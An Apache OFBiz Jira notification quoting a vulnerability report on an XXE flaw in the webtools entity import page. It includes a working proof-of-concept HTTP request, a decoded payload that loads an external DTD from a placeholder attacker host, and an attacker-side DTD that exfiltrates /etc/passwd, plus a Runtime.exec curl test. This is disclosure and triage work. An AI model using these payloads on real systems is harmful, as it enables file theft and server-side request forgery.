[
https://issues.apache.org/jira/browse/OFBIZ-11197?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Jacques Le Roux updated OFBIZ-11197:
------------------------------------
Parent: OFBIZ-1525
Issue Type: Sub-task (was: Bug)
> Arbitrary Code Execution
> ------------------------
>
> Key: OFBIZ-11197
> URL: https://issues.apache.org/jira/browse/OFBIZ-11197
> Project: OFBiz
> Issue Type: Sub-task
> Components: framework/webtools
> Affects Versions: Trunk
> Reporter: Jacques Le Roux
> Priority: Major
>
> This was reported to the OFBiz security team by Jason Nordenstam from
> offensive-security.com. We did not consider it as a real security issue
> because it requires authentication.
> {quote}
> Authenticated users can import XML documents containing DTDs. The SAX parser
> used by the XML Data Import functionality does not have DTD parsing
> explicitly disabled which makes it vulnerable to XXE attacks.
> The results of the import are not displayed in the page which means an
> 'error-based' approach is needed to read local files. The parser will also
> resolve external entities so this vulnerability can also be used for internal
> port scanning or server-side request forgery.
> Affected URL:
> /webtools/control/entityImport
> POC Example Request:
> POST /webtools/control/entityImport HTTP/1.1
> Host:<host>
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
> Firefox/60.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Referer: <host>/webtools/control/entityImport
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 312
> Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
> Connection: close
> Upgrade-Insecure-Requests: 1
> fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A
> Payload One Decoded:
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE notfound [
> <!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
> %base;
> %param1;
> %external;
> ]>
> <root><foo>bar</bar></root>
> error.dtd on Attacking Machine:
> <!ENTITY % payload SYSTEM "file:///etc/passwd">
> <!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>" >
> {quote}
> Works using:
> Runtime rt = Runtime.getRuntime();
> rt.exec("curl https://demo-trunk.ofbiz.apache.org:9090/pingtest";);
> We get:
> ofbizDemo@ofbiz-vm3:~$ python -m SimpleHTTPServer 9090
> Serving HTTP on 0.0.0.0 port 9090 ...
> 172.31.43.132 - - [31/Aug/2019 07:37:00] code 400, message Bad request syntax
> ("\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03\x900q\xa3\xae
> a\xc4\r\xb6eA\xd8\x0bv/\x13k\xce\x01Q\xd4\xd3\x87w\\I\xca\x8b~\xab\xa4
> 2Re|\xdc\xcb\x85p\x8f\x8e\xab\xee\x04*\xe7\xcb\xfd\xba\x0eu\x14z\x91\xedN\xbd\x91\xb3jy\xae\xc7\x00>\x13\x02\x13\x03\x13\x01\xc0,\xc00\x00\x9f\xcc\xa9\xcc\xa8\xcc\xaa\xc0+\xc0/\x00\x9e\xc0$\xc0(\x00k\xc0#\xc0'\x00g\xc0")
> ¦eA¦31.43.132 - - [31/Aug/2019 07:37:00] "¦¦0q¦¦ a¦
> v/k¦Q¦?w\I?~¦¦ 2Re|¦?p¦¦¦¦*¦¦¦uz¦¦N¦¦¦jy¦¦>¦,¦0¦???¦+¦/¦¦$¦(k¦#¦'g¦" 400 -
> Not sure what we can really do with that on OFBiz server side, but clearly
> something happens
--
This message was sent by Atlassian Jira
(v8.3.2#803003)
